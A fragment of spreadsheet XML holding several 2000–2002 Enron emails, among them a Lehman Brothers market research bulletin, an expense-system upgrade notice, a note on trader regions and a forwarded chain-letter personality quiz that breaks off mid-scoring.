    <t>frozenset({'george.kneisley@enron.com', 'rick.craig@enron.com', 'larry.craddock@enron.com', 'ben.tanner@enron.com', 'ellis.stern@enron.com', 'jackie.birch@enron.com', 'willie.cowart@enron.com', 'steve.klimesh@enron.com', 'don.hawkins@enron.com', 'jackie.hewett@enron.com', 'dan.pribble@enron.com', 'raetta.zadow@enron.com', 'jodie.floyd@enron.com', 'charlie.thompson@enron.com', 'shelley.corman@enron.com', 'randy.rice@enron.com', 'sammy.williams@enron.com', 'lynn.blair@enron.com', 'ronnie.brickman@enron.com', 'rick.kile@enron.com', 'e..anderson@enron.com', 'bobbie.lachapelle@enron.com'})</t>
  </si>
  <si>
    <t>Chart Label Check-In Status Report</t>
  </si>
  <si>
    <t>Attached is the Chart Label Check In Report.  If you have any questions please let me know._x000D_
_x000D_
 _x000D_
_x000D_
_x000D_
_x000D_
Thanks_x000D_
Robin</t>
  </si>
  <si>
    <t>Mon, 23 Apr 2001 17:06:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'morris@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'jordan.larimore@lehman.com', 'larimore@enron.com'})</t>
  </si>
  <si>
    <t>The Morning Market Call - Monday April 23rd, 2001.</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;&lt;MF April 23rd 2001.pdf&gt;&gt;_x000D_
_x000D_
			Good Monday Morning - Comments From The Local Guys!_x000D_
_x000D_
At the end of 2000, a new Federal Insider-Trading Rule (Rule 10b5-1) was_x000D_
adopted by the SEC under the Securities Exchange Act of 1934. This rule_x000D_
greatly enhances an insider's/employee's ability to trade his/her corporate_x000D_
shares during blackout periods._x000D_
_x000D_
We, the Local Guys would like our readers to know of this new rule change_x000D_
because of its significant advantages over the prior insider trading rules._x000D_
Previously, without the protection of this new SEC rule, employees and_x000D_
insiders could safely trade only outside of designated blackout windows._x000D_
_x000D_
Under this new rule, insiders/employees may have the ability to purchase and_x000D_
sell their corporate shares even during blackout periods if a written plan_x000D_
was established and in force when the insider/employee was not in possession_x000D_
of material, non-public information.  The new rule contains other_x000D_
restrictions and should be reviewed carefully._x000D_
_x000D_
Lehman Brothers has established a turn-key plan that take into account the_x000D_
regulatory procedures for establishing such a plan._x000D_
_x000D_
Please email us or call us for more information._x000D_
_x000D_
_x000D_
The 30-year US T-Bond yield is 5.72%._x000D_
The 10-year yield is 5.18%._x000D_
The 5-year is trading at 4.69%._x000D_
Spot crude oil is trading at $27.81 p/b._x000D_
Natural Gas - Henry Hub -  is trading at $5.12 p/mcf._x000D_
_x000D_
AD Time:_x000D_
			The Local Guys! - Who We Are._x000D_
_x000D_
- The partnership of Jordan Larimore and David Morris manages investments_x000D_
for individual and corporate clients._x000D_
- We help investors achieve their personal and professional portfolio goals._x000D_
_x000D_
- We manage individual portfolios.._x000D_
- We use Outside Money Managers._x000D_
- We utilize the top Mutual Fund Families._x000D_
- We help with portfolio re-diversification - taking investors out of highly_x000D_
concentrated equity situations and rediversifying those dollars._x000D_
- We also work on Corporate Stock Option Plans and 144 Restricted Stock_x000D_
issues._x000D_
_x000D_
- We welcome hearing from you! Call us toll-free at 1-800-227-4537._x000D_
_x000D_
_x000D_
				Lehman's Research._x000D_
_x000D_
IMPACT CALLS_x000D_
_x000D_
Oracle Corp(ORCL) 2 - Buy N. Herman, .212.526.6093_x000D_
Near-term WorriesDowngrade Oracle to a 2 (C)_x000D_
OLD NEW STREET P/E_x000D_
Price: $19.75 EPS 2000 N/A $0.34 N/A N/A_x000D_
52 Wk Ra: $46 - 13 EPS 2001 $0.44E $0.44E $0.44E 44.9_x000D_
Mkt Cap: $118.8B EPS 2002 $0.55E $0.49E $0.52E 40.3_x000D_
FY: 5/31 Price Target $50 $50_x000D_
Rank 1 2_x000D_
*Although its still early in the quarter, we worry that what is typically a_x000D_
seasonally strong quarter for Oracle could prove to be_x000D_
unusually weak given the tough U.S. macroeconomic environment and_x000D_
potentially weakening conditions in international markets._x000D_
*Apparently, more Sun servers are sold running Oracle software than anything_x000D_
else. Weak results and guidance from Sun only serve_x000D_
to compound our near-term worries._x000D_
*We believe that IBM with DB2 is exerting some price pressure on Oracle and_x000D_
is gaining momentum with Morgan Stanley and_x000D_
Goldman Sachs being two high profile firms making big commitments to DB2._x000D_
*With its rise over the last two weeks, shares of Oracle are trading at a_x000D_
significant premium to the historic range both on a PE and_x000D_
revenue multiple basis despite near-term uncertainty. Lowering earnings_x000D_
estimates and rating to 2-Buy._x000D_
_x000D_
INITIATING COVERAGE_x000D_
_x000D_
Agere Systems(AGRA) 3 - Market Perform A. Chanda, .415.274.5370_x000D_
A Communications Component Giant is Unleashed (C)_x000D_
OLD NEW STREET P/E_x000D_
Price: $7.57 EPS 2000 N/A $0.32 N/A N/A_x000D_
52 Wk Ra: $8 - 4 EPS 2001 N/A -$0.05E N/A N/A_x000D_
Mkt Cap: $12.4B EPS 2002 N/A -$0.07E N/A N/A_x000D_
FY: 12/31 Price Target N/A N/A_x000D_
Rank N 3_x000D_
*We are initiating coverage of Agere, a communications components gorilla._x000D_
We note that the valuation is low but given slowdowns in_x000D_
capital spending and inventories and margin contraction we would prefer to_x000D_
stay on the sidelines until fundamentals improve._x000D_
*We are establishing C01 revenues of $4.1 billion (-20% y/y) and C02_x000D_
revenues of $4.4 billion (up 8% y/y) and EPS of a loss of $0.15_x000D_
and a loss of $0.02._x000D_
*Agere had 31% of revenues in optoelectronics and 69% in ICs in Dec:00. The_x000D_
vast majority of optoelectronics is in active_x000D_
components and modules. In ICs, roughly 10% is in storage, 10% in wireless_x000D_
terminals and infrastructure, 12% in wireless LAN,_x000D_
37% in access (SLICs, modems) and 31% in communications. Agere tends to sell_x000D_
most IC products in the form of ASICs_x000D_
manufactured internally. Agere's only large customer is Lucent which was 17%_x000D_
of revenues in December._x000D_
_x000D_
FOCUS STOCKS_x000D_
_x000D_
Exodus Communications(EXDS) 2 - Buy H. Blount, .212.526.9128_x000D_
If the Decks are Cleared -- Buy (C)_x000D_
OLD NEW STREET P/E_x000D_
Price: $9.75 EPS 2000 N/A -$0.54 N/A N/A_x000D_
52 Wk Ra: $69 - 6 EPS 2001 -$0.89E -$0.89E -$0.85E N/A_x000D_
Mkt Cap: $5.2B EPS 2002 -$0.51E -$0.51E $0.13E N/A_x000D_
FY: 12/31 Price Target $20 $20_x000D_
Rank 2 2_x000D_
*We believe Exodus will have an opportunity to "Clear the Decks" of bad news_x000D_
during 1Q01 earnings. If so, we believe investors_x000D_
should begin to aggressively buy the stock._x000D_
*If EXDS reports weak bookings and brings down 2001 revenue guidance to_x000D_
street consensus, it will "clear the decks" of further bad_x000D_
news. Under this scenario, we would suggest investors become more aggressive_x000D_
in purchasing the stock, despite lack of future_x000D_
visibility._x000D_
*The primary scenario where we would remain cautious would be if EXDS_x000D_
reports weak bookings and does not lower 2001 revenue_x000D_
guidance._x000D_
*Based on three different valuation analysis, we believe EXDS has a_x000D_
favorable 2 to 1 reward/risk ratio from current levels._x000D_
_x000D_
Paper &amp; Forest Products P. Ruschmeier, .212.526.9898_x000D_
Rally in Wood Product Markets Picking Up Steam_x000D_
*As the rally in wood products picks up steam, we are reiterating our_x000D_
favorable ratings on the following wood product producers: LPX,_x000D_
GP, WY, BCC, TIN, BOW, and to a lesser degree, IP._x000D_
*The rally in wood product markets picked up steam last week as cash prices_x000D_
for plywood, OSB, and lumber jumped 9%, 9%, and 3%,_x000D_
respectively. The rally is supported by 1) seasonal strength, 2) sharply_x000D_
lower interest rates, 3) firm demand, 4) low pipeline_x000D_
inventories, and 5) GP's plans to permanently close 1.4% of North American_x000D_
plywood capacity. In addition, the Department of_x000D_
Commerce will likely rule today on whether to investigate countervailing_x000D_
duties._x000D_
*If the current rally in wood product markets continues, the risk to our_x000D_
estimates will be on the upside._x000D_
_x000D_
Tellabs, Inc(TLAB) 1 - Strong Buy S. Levy, .212.526.2499_x000D_
Snake Bit (C)_x000D_
OLD NEW STREET P/E_x000D_
Price: $35.58 EPS 2000 N/A $1.67 N/A N/A_x000D_
52 Wk Ra: $77 - 31 EPS 2001 $1.75E $1.55E $1.72E 23.0_x000D_
Mkt Cap: $14.8B EPS 2002 N/A $2.00E $2.58E 17.8_x000D_
FY: 12/31 Price Target $50 $50_x000D_
Rank 1 1_x000D_
*Our confidence in healthy SONET sales continues unabated and we believe the_x000D_
current slowdown in sales of the TITAN 5500 solely_x000D_
reflects service provider spending uncertainty and not a fundamental_x000D_
architectural shift or any slackening in demand for high_x000D_
bandwidth services._x000D_
*Actual March quarter sales of $772 mil met our revised projection of $772_x000D_
mil with final EPS of $0.29 in line with our expectations._x000D_
*We now project sales and EPS including g/w amort of $3.6 billion and $1.55_x000D_
in 2001 and $4.439 billion and $2.00 in 2002. Our new_x000D_
estimates also project 2001 TITAN 5500 sales of $1.95 bil and $2.145 bil in_x000D_
2002 (10% growth), TITAN 6500 and 6100 system of_x000D_
$175 mil in 2001 and $340 mil in 2002, and continue to expect initial sales_x000D_
of both in 2Q._x000D_
*We est. a minimal 3-5 year sales CAGR of 20% for Tellabs and believe the_x000D_
shares should trade at 25x our new CY02 est, or $50 by_x000D_
the end of the year. We reiterate our 1 Strong Buy and $50 price target._x000D_
_x000D_
QUALCOMM Inc(QCOM) 1 - Strong Buy T. Luke, .212.526.4993_x000D_
Previewing Solid 2Q01, Maintain 1 Buy (A,C)_x000D_
OLD NEW STREET P/E_x000D_
Price: $66.33 EPS 2000 N/A $1.05 N/A N/A_x000D_
52 Wk Ra: $120 - 43 EPS 2001 $1.27E $1.22E $1.26E 54.4_x000D_
Mkt Cap: $49.8B EPS 2002 N/A N/A $1.68E N/A_x000D_
FY: 9/30 Price Target $120 $120_x000D_
Rank 1 1_x000D_
*We look for wireless innovator QCOM to deliver solid 2Q01 results in line_x000D_
with expectations on Wednesday 4/25. Expect_x000D_
management commentary to be upbeat highlighting strength of QCOM's l-term_x000D_
positioning. We reit our 1 Buy rating_x000D_
*Expect QCOM to comfortably meet our consensus EPS est of $0.29 with sales_x000D_
of approx $690-700M helped by solid chip shipments_x000D_
of around 16M units_x000D_
*Expect positive mgmt tone underlining: 1X upgrade cycle, steady expansion_x000D_
of global CDMA markets &amp; potential for QoQ uptick in_x000D_
chip shipments throughout FY01 despite handset inventory worries_x000D_
*Ahead of results, finetuning our ests for June &amp; Sept Q's to reflect more_x000D_
conservative assumptions for a) R&amp;D investment b) QoQ_x000D_
uptick in chip shipments. FY01 moves to $1.22 from $1.27, CY01 is $1.21._x000D_
*Catalysts remain more 3G licensing deals (NOK, ALA, Siemens), China orders,_x000D_
1X rollout. QCOM continues to extend leadership in_x000D_
wireless chip design &amp; remains a top pick. Target is $120_x000D_
_x000D_
COMPANY/INDUSTRY UPDATES_x000D_
Commodity Chemicals S. Vasnetsov, .212.526.3212_x000D_
Instead of flowers, spring brings drought in chemical_x000D_
*On our recent research trip, we found that US chemical industry continues_x000D_
to struggle with slow demand in April, contrary to_x000D_
typically robust seasonal demand pattern. We expect recovery in chemical_x000D_
demand only in late 2001, followed by improvement in_x000D_
cash margins in early 2002._x000D_
*In the winter of 2000-01, the US commodity chemicals saw the worst_x000D_
operating conditions since 1985._x000D_
*The hope was that conditions will improve in the spring 2001, as less_x000D_
expensive oil and gas, coupled with more robust seasonal_x000D_
demand, will help to improve both sales volume and cash margins._x000D_
*So far, this widely expected improvement has NOT happen, as our research_x000D_
trip uncovered. We expect that on upcoming 1Q_x000D_
conference calls companies will offer more cautious outlook for 2Q'01 and_x000D_
for the entire year._x000D_
_x000D_
David C. Morris_x000D_
Sr. VP Lehman Brothers_x000D_
713-652-7112/800-227-4537_x000D_
dcmorris@lehman.com_x000D_
_x000D_
Disclosure Legend: A-Lehman Brothers Inc. managed or co-managed within the_x000D_
past three years a public offering of securities for this company. B-An_x000D_
employee of Lehman Brothers Inc. is a director of this company. C-Lehman_x000D_
Brothers Inc. makes a market in the securities of this company. G-The_x000D_
Lehman Brothers analyst who covers this company also has position in its_x000D_
securities._x000D_
Key to Investment Rankings: This is a guide to expected total return (price_x000D_
performance plus dividend) relative to the total return of the stock's local_x000D_
market over the next 12 months. 1 = Strong Buy (expected to outperform the_x000D_
market by 15 or more percentage points); 2=Buy (expected to outperform_x000D_
the market by 5-15 percentage points); 3=Market Perform (expected to perform_x000D_
in line with the market, plus or minus 5 percentage points); 4=Market_x000D_
Underperform (expected to underperform the market by 5-15 percentage_x000D_
points); 5=Sell (expected to underperform the market by 15 or more_x000D_
percentage_x000D_
points)._x000D_
This document is for information purposes only. We do not represent that_x000D_
this information is complete or accurate. All opinions are subject to_x000D_
change._x000D_
The securities mentioned may not be eligible for sale in some states or_x000D_
countries. This document has been prepared by Lehman Brothers Inc., Member_x000D_
SIPC, on behalf of Lehman Brothers International (Europe), which is_x000D_
regulated by the SFA. ?Lehman Brothers, Inc._x000D_
_x000D_
_x000D_
------------------------------------------------------------------------------_x000D_
This message is intended only for the personal and confidential use of the designated recipient(s) named above.  If you are not the intended recipient of this message you are hereby notified that any review, dissemination, distribution or copying of this message is strictly prohibited.  This communication is for information purposes only and should not be regarded as an offer to sell or as a solicitation of an offer to buy any financial product, an official confirmation of any transaction, or as an official statement of Lehman Brothers Inc.  Email transmission cannot be guaranteed to be secure or error-free.  Therefore, we do not represent that this information is complete or accurate and it should not be relied upon as such.  All information is subject to change without notice._x000D_
_x000D_
_x000D_
 - MF April 23rd 2001.pdf </t>
  </si>
  <si>
    <t>Wed, 30 Jan 2002 11:26:21 -0800 (PST)</t>
  </si>
  <si>
    <t>RE: Reminder</t>
  </si>
  <si>
    <t>Stacey, talked to Tim and all traders can trade all regions. So Mike Swerzbin's trading book is NW but he can trade anywhere in CA or SW. Does that answer your question?_x000D_
_x000D_
John_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	White, Stacey W.  _x000D_
Sent:	Tuesday, January 29, 2002 3:19 PM_x000D_
To:	Postlethwaite, John_x000D_
Subject:	FW: Reminder_x000D_
_x000D_
Also, will you get Tim to give direction on what traders will be allowed to trade what regions._x000D_
_x000D_
Thanks,_x000D_
Stacey_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	White, Stacey W.  _x000D_
Sent:	Tuesday, January 29, 2002 3:45 PM_x000D_
To:	Postlethwaite, John_x000D_
Subject:	Reminder_x000D_
_x000D_
Just a reminder to make sure you get Tim a list of books/regions that are currently designated to be traded.  We need to change trader names etc. so make sure he gets us this information as soon as possible._x000D_
_x000D_
Stacey</t>
  </si>
  <si>
    <t>Thu, 19 Apr 2001 05:18:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: FW: anyone up for a movie sat?</t>
  </si>
  <si>
    <t>YES YES YES_x000D_
_x000D_
_x000D_
Debra Perlingiere_x000D_
Enron North America Corp._x000D_
Legal Department_x000D_
1400 Smith Street, EB 3885_x000D_
Houston, Texas 77002_x000D_
dperlin@enron.com_x000D_
Phone 713-853-7658_x000D_
Fax  713-646-3490</t>
  </si>
  <si>
    <t>Thu, 7 Jun 2001 15:32:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'all.users@enron.com'})</t>
  </si>
  <si>
    <t>XMS Upgrade Transition Plan - All XMS Users Please Read!!</t>
  </si>
  <si>
    <t xml:space="preserve">      Concur Expense (XMS) Upgrade!_x000D_
_x000D_
On July 2, 2001, Enron=01,s Corporate Expense Management Solution will unde=_x000D_
rgo=20_x000D_
an upgrade to version 6.0.2. =20_x000D_
The Integrated Solution Center (ISC) has developed a transition plan=20_x000D_
containing several important deadlines affecting=20_x000D_
all XMS users._x000D_
_x000D_
_x000D_
       Transition Schedule_x000D_
_x000D_
_x000D_
Important Date #1 - Monday, June 18th_x000D_
? American Express transactions will no longer be loaded into the current X=_x000D_
MS=20_x000D_
system starting June 18th.  Beginning June 18th, all AMEX transactions will=_x000D_
=20_x000D_
be loaded into the new Concur Expense (XMS) system._x000D_
?  Beginning June 18th, the ISC will be solely responsible for adding new=_x000D_
=20_x000D_
users to the current XMS system.  On July 2nd, new users created in SAP HR=_x000D_
=20_x000D_
will be  automatically loaded into the new Concur Expense (XMS) system._x000D_
=20_x000D_
_x000D_
Important Date #2 - Wednesday, June 27th_x000D_
? This marks the deadline for entering new expense reports into the current=_x000D_
=20_x000D_
XMS system.  All open expense reports in XMS must be submitted and approved=_x000D_
 =20_x000D_
by June 27th.  All users will be locked out of XMS after this date!!_x000D_
_x000D_
_x000D_
Important Date #3 - Monday, July 2nd_x000D_
? The new version of Concur Expense (XMS ver. 6.0.2) goes LIVE!!!_x000D_
_x000D_
For a list of frequently asked questions (FAQ), please click on the followi=_x000D_
ng=20_x000D_
link:  http://isc.enron.com/site/xmsfaqs.htm_x000D_
_x000D_
If you have any other questions on any of the above items, please contact t=_x000D_
he=20_x000D_
ISC Call Center at 713-345-4727.</t>
  </si>
  <si>
    <t>Tue, 29 Feb 2000 09:48:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'rglover@halff.com'})</t>
  </si>
  <si>
    <t>frozenset({'clayriddle@yahoo.com', 'kcdavis@pdq.net', 'travis_cash@dell.com', 'doodoc@hotmail.com', 'joncross@rlkengineering.com', 'kfku@dynegy.com', 'clay@ectisp.net', 'ddewey@halff.com', 'jbeard@halff.com', 'edcom@texas.net', 'ckhalla@swbell.net', 'tfletcher@halff.com', 'daren.farmer@enron.com', 'jm.glover@meritenergy.com', 'aggieengineer@email.msn.com', 'kevin_cameron@sealand.com', 'glover@neto.com'})</t>
  </si>
  <si>
    <t>43</t>
  </si>
  <si>
    <t>-----Original Message-----_x000D_
From: TCash@aimtech.net [mailto:TCash@aimtech.net]_x000D_
Sent: Tuesday, February 29, 2000 11:22 AM_x000D_
To: Shane Walls_x000D_
Cc: KFKU@dynegy.com; cashj@kochind.com; maolson.baycity@celanese.com;_x000D_
Cash, April; CCHSDA@lyondell.com; BAMBAM6901@aol.com; Glover, Rusty;_x000D_
Clay_Carbaugh@acco.com; AHernand@kentelec.com_x000D_
Subject: I scored a 41_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
&gt;&gt; &gt;_x000D_
&gt;&gt; &gt;_x000D_
&gt; *************************************************************************_x000D_
&gt;&gt; &gt; *****_x000D_
&gt;&gt; &gt; *******************_x000D_
&gt;&gt; &gt;_x000D_
&gt;&gt; &gt; To: undisclosed-recipients:;_x000D_
&gt;&gt; &gt;_x000D_
&gt;&gt; &gt;  Simple test, take a minute to complete, very interesting._x000D_
&gt;&gt; &gt;_x000D_
&gt;&gt; &gt;_x000D_
&gt;&gt; &gt;  Take this test for yourself...and send it to your friends, including_x000D_
&gt; me,_x000D_
&gt;&gt; &gt;_x000D_
&gt;&gt; &gt;  and let them know who you are. My score is in the subject box..._x000D_
&gt;&gt; &gt;  Don't peek but begin the test as you scroll down and answer._x000D_
&gt;&gt; &gt;_x000D_
&gt;&gt; &gt;  Answers are for who you are now...not who you were in the past._x000D_
&gt;&gt; &gt;  Have pen or pencil and paper ready. This is a real test given by the_x000D_
&gt;&gt; &gt;  Human Relations Dept at many of the major corporations today. It_x000D_
&gt;&gt; &gt;  helps them get a better insight concerning their employees and_x000D_
&gt;&gt; &gt;  potential employees.  It's only 10 simple questions, so... Grab a_x000D_
&gt;&gt; &gt;  pencil and paper, keeping track of your letter answers. Make sure_x000D_
&gt;&gt; &gt;  to change the subject of the e-mail to read YOUR total.  When you are_x000D_
&gt;&gt; &gt;  finished, forward this to as many friends as you have, and also send_x000D_
it_x000D_
&gt;&gt; &gt; to_x000D_
&gt;&gt; &gt;  the person who sent this to you._x000D_
&gt;&gt; &gt;_x000D_
&gt;&gt; &gt;  Make sure to put YOUR score in the subject box._x000D_
&gt;&gt; &gt;_x000D_
&gt;&gt; &gt;_x000D_
&gt;&gt; &gt;_x000D_
&gt;&gt; &gt;  Ready??  Begin..._x000D_
&gt;&gt; &gt;_x000D_
&gt;&gt; &gt;  1.  When do you feel your best?_x000D_
&gt;&gt; &gt;_x000D_
&gt;&gt; &gt;       (a)  in the morning_x000D_
&gt;&gt; &gt;       (b)  during the afternoon &amp; early evening_x000D_
&gt;&gt; &gt;       (c)  late at night_x000D_
&gt;&gt; &gt;_x000D_
&gt;&gt; &gt;_x000D_
&gt;&gt; &gt;_x000D_
&gt;&gt; &gt;  2.  You usually walk_x000D_
&gt;&gt; &gt;_x000D_
&gt;&gt; &gt;       (a)  fairly fast, with long steps_x000D_
&gt;&gt; &gt;       (b)  fairly fast, with short, quick steps_x000D_
&gt;&gt; &gt;       (c)  less fast head up, looking the world in the face_x000D_
&gt;&gt; &gt;       (d)  less fast, head down_x000D_
&gt;&gt; &gt;       (e)  very slowly_x000D_
&gt;&gt; &gt;_x000D_
&gt;&gt; &gt;_x000D_
&gt;&gt; &gt;_x000D_
&gt;&gt; &gt;  3.  When talking to people you_x000D_
&gt;&gt; &gt;_x000D_
&gt;&gt; &gt;       (a)  stand with your arms folded_x000D_
&gt;&gt; &gt;       (b)  have your hands clasped_x000D_
&gt;&gt; &gt;       (c)  have one or both your hands on your hips_x000D_
&gt;&gt; &gt;       (d)  touch or push the person to whom you are talking_x000D_
&gt;&gt; &gt;       (e)  play with your ear, touch your chin,or smooth your hair_x000D_
&gt;&gt; &gt;_x000D_
&gt;&gt; &gt;_x000D_
&gt;&gt; &gt;_x000D_
&gt;&gt; &gt;_x000D_
&gt;&gt; &gt;  4.  When relaxing, you sit with_x000D_
&gt;&gt; &gt;_x000D_
&gt;&gt; &gt;       (a)  your knees bent with your legs neatly side by side_x000D_
&gt;&gt; &gt;       (b)  your legs crossed_x000D_
&gt;&gt; &gt;       (c)  your legs stretched out or straight_x000D_
&gt;&gt; &gt;       (d)  one leg curled under you_x000D_
&gt;&gt; &gt;_x000D_
&gt;&gt; &gt;_x000D_
&gt;&gt; &gt;_x000D_
&gt;&gt; &gt;  5.  When something really amuses you, you react with_x000D_
&gt;&gt; &gt;_x000D_
&gt;&gt; &gt;       (a)  a big, appreciative laugh_x000D_
&gt;&gt; &gt;       (b)  a laugh, but not a loud one_x000D_
&gt;&gt; &gt;       (c)  a quiet chuckle_x000D_
&gt;&gt; &gt;       (d)  a sheepish smile_x000D_
&gt;&gt; &gt;_x000D_
&gt;&gt; &gt;_x000D_
&gt;&gt; &gt;_x000D_
&gt;&gt; &gt;     6.  When you go to a party or social gathering you.._x000D_
&gt;&gt; &gt;_x000D_
&gt;&gt; &gt;       (a)  make a loud entrance so everyone notices you_x000D_
&gt;&gt; &gt;       (b)  make a quiet entrance, looking around for someone you know_x000D_
&gt;&gt; &gt;       (c)  make the quietest entrance, trying to stay unnoticed_x000D_
&gt;&gt; &gt;_x000D_
&gt;&gt; &gt;_x000D_
&gt;&gt; &gt;_x000D_
&gt;&gt; &gt;  7.  You're working very hard, concentrating hard, and you're_x000D_
&gt;&gt; &gt;  interrupted. Do you.._x000D_
&gt;&gt; &gt;_x000D_
&gt;&gt; &gt;       (a)  welcome the break_x000D_
&gt;&gt; &gt;       (b)  feel extremely irritated_x000D_
&gt;&gt; &gt;       (c)  vary between these two extremes_x000D_
&gt;&gt; &gt;_x000D_
&gt;&gt; &gt;_x000D_
&gt;&gt; &gt;_x000D_
&gt;&gt; &gt;     8.  Which of the following colors do you like most?_x000D_
&gt;&gt; &gt;_x000D_
&gt;&gt; &gt;       (a)  red or orange_x000D_
&gt;&gt; &gt;       (b)  black_x000D_
&gt;&gt; &gt;       (c)  yellow or light blue_x000D_
&gt;&gt; &gt;       (d)  green_x000D_
&gt;&gt; &gt;       (e)  dark blue or purple_x000D_
&gt;&gt; &gt;       (f)   white_x000D_
&gt;&gt; &gt;       (g)  brown or gray_x000D_
&gt;&gt; &gt;_x000D_
&gt;&gt; &gt;_x000D_
&gt;&gt; &gt;_x000D_
&gt;&gt; &gt;     9.  When you are in bed at night, in those last few moments before_x000D_
&gt;&gt; &gt;  going to sleep, you lie_x000D_
&gt;&gt; &gt;_x000D_
&gt;&gt; &gt;       (a)  stretched out on your back_x000D_
&gt;&gt; &gt;       (b)  stretched out face down on your stomach_x000D_
&gt;&gt; &gt;       (c)  on your side, slightly curled_x000D_
&gt;&gt; &gt;       (d)  with your head on one arm_x000D_
&gt;&gt; &gt;       (e)  with your head under the covers_x000D_
&gt;&gt; &gt;_x000D_
&gt;&gt; &gt;_x000D_
&gt;&gt; &gt;_x000D_
&gt;&gt; &gt;  10.  You often dream that you are_x000D_
&gt;&gt; &gt;_x000D_
&gt;&gt; &gt;       (a)  falling_x000D_
&gt;&gt; &gt;       (b)  fighting or struggling_x000D_
&gt;&gt; &gt;       (c)  searching for something or somebody_x000D_
&gt;&gt; &gt;       (d)  flying or floating_x000D_
&gt;&gt; &gt;       (e)  you usually have dreamless sleep_x000D_
&gt;&gt; &gt;       (f)   your dreams are always pleasant_x000D_
&gt;&gt; &gt;_x000D_
&gt;&gt; &gt;_x000D_
&gt;&gt; &gt;_x000D_
&gt;&gt; &gt;     POINTS:_x000D_
&gt;&gt; &gt;_x000D_
&gt;&gt; &gt;_x000D_
&gt;&gt; &gt;_x000D_
&gt;&gt; &gt;     1. (a) 2_x000D_
&gt;&gt; &gt;        (b) 4_x000D_
&gt;&gt; &gt;        (c) 6_x000D_
&gt;&gt; &gt;_x000D_
&gt;&gt; &gt;     2. (a) 6_x000D_
&gt;&gt; &gt;        (b) 4_x000D_
&gt;&gt; &gt;        (c) 7_x000D_
&gt;&gt; &gt;        (d) 2_x000D_
&gt;&gt; &gt;        (e) 1_x000D_
&gt;&gt; &gt;_x000D_
&gt;&gt; &gt;     3. (a) 4_x000D_
&gt;&gt; &gt;        (b) 2_x000D_
&gt;&gt; &gt;        (c) 5_x000D_
&gt;&gt; &gt;        (d) 7_x000D_
&gt;&gt; &gt;        (e) 6_x000D_
&gt;&gt; &gt;_x000D_
&gt;&gt; &gt;     4. (a) 4_x000D_
&gt;&gt; &gt;        (b) 6_x000D_
&gt;&gt; &gt;        (c) 2_x000D_
&gt;&gt; &gt;        (d) 1_x000D_
&gt;&gt; &gt;_x000D_
&gt;&gt; &gt;     5. (a) 6_x000D_
&gt;&gt; &gt;        (b) 4_x000D_
&gt;&gt; &gt;        (c) 3_x000D_
&gt;&gt; &gt;        (d) 5_x000D_
&gt;&gt; &gt;        (e) 2_x000D_
&gt;&gt; &gt;_x000D_
&gt;&gt; &gt;     6. (a) 6_x000D_
&gt;&gt; &gt;        (b) 4_x000D_
&gt;&gt; &gt;        (c) 2_x000D_
&gt;&gt; &gt;_x000D_
&gt;&gt; &gt;     7. (a) 6_x000D_
&gt;&gt; &gt;        (b) 2_x000D_
&gt;&gt; &gt;        (c) 4_x000D_
&gt;&gt; &gt;_x000D_
&gt;&gt; &gt;     8. (a) 6_x000D_
&gt;&gt; &gt;        (b) 7_x000D_
&gt;&gt; &gt;        (c) 5_x000D_
&gt;&gt; &gt;        (d) 4_x000D_
&gt;&gt; &gt;        (e) 3_x000D_
&gt;&gt; &gt;        (f) 2_x000D_
&gt;&gt; &gt;        (g) 1_x000D_
&gt;&gt; &gt;_x000D_
&gt;&gt; &gt;  9.  (a) 7_x000D_
&gt;&gt; &gt;        (b) 6_x000D_
&gt;&gt; &gt;        (c) 4_x000D_
&gt;&gt; &gt;        (d) 2_x000D_
&gt;&gt; &gt;        (e) 1_x000D_
&gt;&gt; &gt;_x000D_
&gt;&gt; &gt;  10. (a) 4_x000D_
&gt;&gt; &gt;        (b) 2_x000D_
&gt;&gt; &gt;        (c) 3_x000D_
&gt;&gt; &gt;        (d) 5_x000D_
&gt;&gt; &gt;        (e) 6_x000D_
&gt;&gt; &gt;        (f) 1_x000D_
&gt;&gt; &gt;_x000D_
&gt;&gt; &gt;  Now add up the total number of points._x000D_
&gt;&gt; &gt;_x000D_
&gt;&gt; &gt;  OVER 60 POINTS:_x000D_
&gt;&gt; &gt;_x000D_
&gt;&gt; &gt;  Others see you as someone they should "handle with_x000D_
&gt;&gt; &gt;  care" You're seen as vain, self-centered, and who_x000D_
&gt;&gt; &gt;  is extremely dominant. Others may admire you, wishing_x000D_
&gt;&gt; &gt;  they could be more like you, but don't always trust_x000D_
&gt;&gt; &gt;  you, hesitating to become too deeply involved with_x000D_
&gt;&gt; &gt;  you._x000D_
&gt;&gt; &gt;_x000D_
&gt;&gt; &gt;  51 TO 60 POINTS:_x000D_
&gt;&gt; &gt;_x000D_
&gt;&gt; &gt;      Others see you as an exciting, highly volatile,_x000D_
&gt;&gt; &gt;  rather impulsive personality;  a natural leader, who's_x000D_
&gt;&gt; &gt;  quick to make decisions, though not always the right_x000D_
&gt;&gt; &gt;  ones.They see you as bold and adventuresome, someone_x000D_
&gt;&gt; &gt;  who will try anything  once;  someone who takes_x000D_
&gt;&gt; &gt;  chances and enjoys an adventure. They enjoy being in_x000D_
&gt;&gt; &gt;  your company because of the excitement you radiate._x000D_
&gt;&gt; &gt;_x000D_
&gt;&gt; &gt;  41 TO 50 POINTS:_x000D_
&gt;&gt; &gt;_x000D_
&gt;&gt; &gt;      Others see you as fresh, lively, charming, amusing,_x000D_
&gt;&gt; &gt;  practical, and always interesting; someone who's_x000D_
&gt;&gt; &gt;  constantly in the center of attention, but sufficiently_x000D_
&gt;&gt; &gt;  well-balanced not to let it go to their head. They_x000D_
&gt;&gt; &gt;  also see you as kind, considerate, and understanding;_x000D_
&gt;&gt; &gt;  someone who'll always cheer them up and help them out._x000D_
&gt;&gt; &gt;_x000D_
&gt;&gt; &gt;  31 TO 40 POINTS:_x000D_
&gt;&gt; &gt;_x000D_
&gt;&gt; &gt;      Others see you as sensible, cautious, careful &amp;_x000D_
&gt;&gt; &gt;  practical.  They see you as clever, gifted, or_x000D_
&gt;&gt; &gt;  talented, but modest...  Not a person who makes_x000D_
